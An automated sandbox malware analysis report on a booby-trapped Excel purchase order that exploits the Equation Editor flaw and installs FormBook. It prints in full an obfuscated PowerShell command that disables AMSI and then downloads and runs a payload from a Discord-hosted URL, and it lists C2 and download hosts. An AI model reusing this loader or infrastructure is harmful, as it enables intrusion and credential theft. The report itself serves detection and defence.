
Windows Analysis Report PO20210722.xlsx

Overview

General Information

Sample Name: PO20210722.xlsx
Analysis ID: 452643
MD5: 67a1fadce73f871b43fcb1f4f587e800
SHA1: 65ba350a884b5c06c17d232c244de610e2305091
SHA256: 4ce9b6af73b53e943f97c68254a1562e4a944403a353146cc8e99a62a8d74314
Tags: VelvetSweatshop, xlsx
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious PowerShell Command Line
Tries to detect virtualization through RDTSC time measurements
Very long command line found
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2716 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 684 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2528 cmdline: 'C:\Users\Public\vbc.exe' MD5: F5041EC4CE468A07ECBFD076BC0F879B)
      • powershell.exe (PID: 2620 cmdline: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,10
1,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,49,56,53,55,54,48,56,48,49,53,57,48,50,47,111,97,100,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,
111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($676544567888888888876545666778)|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • calc.exe (PID: 1900 cmdline: {path} MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
          • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • NAPSTAT.EXE (PID: 2184 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
            • cmd.exe (PID: 2844 cmdline: /c del 'C:\WINDOWS\syswow64\calc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.homekeycap.com/pjje/"], "decoy": ["itsa-lifestyle.com", "searchclemson.com", "valenciabusiness.online", "valengz.com", "matematika-ege.online", "freetreeapp.com", "izzyworldpros.com", "qualityhealthsupply.com", "bedrockmappingllc.com", "sistersexlesbian.party", "numerologistreading.com", "bearcreekcattlebeef.com", "trophiesandtributes.com", "rajuherbalandspicegarden.com", "code-nana.com", "sofiepersson.com", "opticalsupples-kw.com", "strawberrylinebikehire.com", "29thplace.com", "oliviabegard.com", "hybridvenues.net", "huo-fo.com", "classicfirearmsny.com", "jlxrcm.com", "910portablestorage.com", "jewelryengravings.com", "loudsink.com", "collabasia.xyz", "northeastkitchenandbath.com", "bodrumdanakliyat.net", "raimirajkumararajah.com", "adultfeedrates.com", "compare-apr-rates.com", "ncdcnow.com", "huashi999.com", "swaplenders.com", "mission-duplex.com", "twenty-four-sevens.com", "growth-gmbh.com", "flying-agent.com", "luatsutruongquochoe.com", "thejewelcartel.com", "virtualbruins.com", "binhminhxanh.online", "wnz.xyz", "polishwithhart.com", "wecameforthis.com", "iti-gov.com", "a2zautoleasing.com", "akhisarozbirotohaliyikama.xyz", "tirupatipackersmovers.com", "virtualtheaterlive.com", "coronavirusfarmer.com", "crysdue.com", "cloolloy.com", "rowynetworks.com", "rakennuspalveluporola.net", "myparadisegetaways.com", "funnelsamurais.com", "thechiropractor.vegas", "04att.com", "copyrightforsupport.com", "hannrise.com", "softmov.com"]}

Yara Overview

Memory Dumps

Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
Source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source: 11.2.calc.exe.400000.1.unpack
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
  • 0x175f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1770c:$sqlite3step: 68 34 1C 7B E1
  • 0x17628:$sqlite3text: 68 38 2A 90 C5
  • 0x1774d:$sqlite3text: 68 38 2A 90 C5
  • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
Source: 11.2.calc.exe.400000.1.raw.unpack
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 172.245.119.43, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 684, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 684, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 684, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2528
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: same vbc.exe process-start event as above (ProcessId 2528, parent EQNEDT32.EXE ProcessId 684)
Sigma detected: Suspicious PowerShell Command Line
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community; Data: Command: the powershell.exe command line of PID 2620 shown in the Process Tree
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: the powershell.exe command line of PID 2620 shown in the Process Tree

          Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe; Virustotal: Detection: 45%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe; Metadefender: Detection: 17%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe; ReversingLabs: Detection: 57%
Source: C:\Users\Public\vbc.exe; Metadefender: Detection: 17%
Source: C:\Users\Public\vbc.exe; ReversingLabs: Detection: 57%
Multi AV Scanner detection for submitted file
Source: PO20210722.xlsx; Virustotal: Detection: 28%
Source: PO20210722.xlsx; ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match; File source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: 11.2.calc.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown; HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: Binary string: wntdll.pdb source: calc.exe, NAPSTAT.EXE
Source: Binary string: napstat.pdb source: calc.exe, 0000000B.00000002.2269767353.00000000007BF000.00000004.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\calc.exe; Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\calc.exe; Code function: 4x nop then pop edi
Source: global traffic; DNS query: name: google.com
Source: global traffic; TCP traffic: 192.168.2.22:49166 -> 162.159.130.233:443
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 172.245.119.43:80
Source: excel.exe; Memory has grown: Private usage: 4MB later: 77MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.homekeycap.com/pjje/
Source: global traffic; HTTP traffic detected (response):
  HTTP/1.1 200 OK
  Date: Thu, 22 Jul 2021 15:18:19 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.21
  Last-Modified: Fri, 16 Jul 2021 21:41:07 GMT
  ETag: "6800-5c74471fec7eb"
  Accept-Ranges: bytes
  Content-Length: 26624
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
Source: Joe Sandbox View | IP Address: 162.159.130.233
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic | HTTP traffic detected: GET /d/obi.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 172.245.119.43 | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 172.245.119.43
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95D899CB.emf
Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000000C.00000000.2217758018.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: google.com
          Source: explorer.exe, 0000000C.00000000.2212091562.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
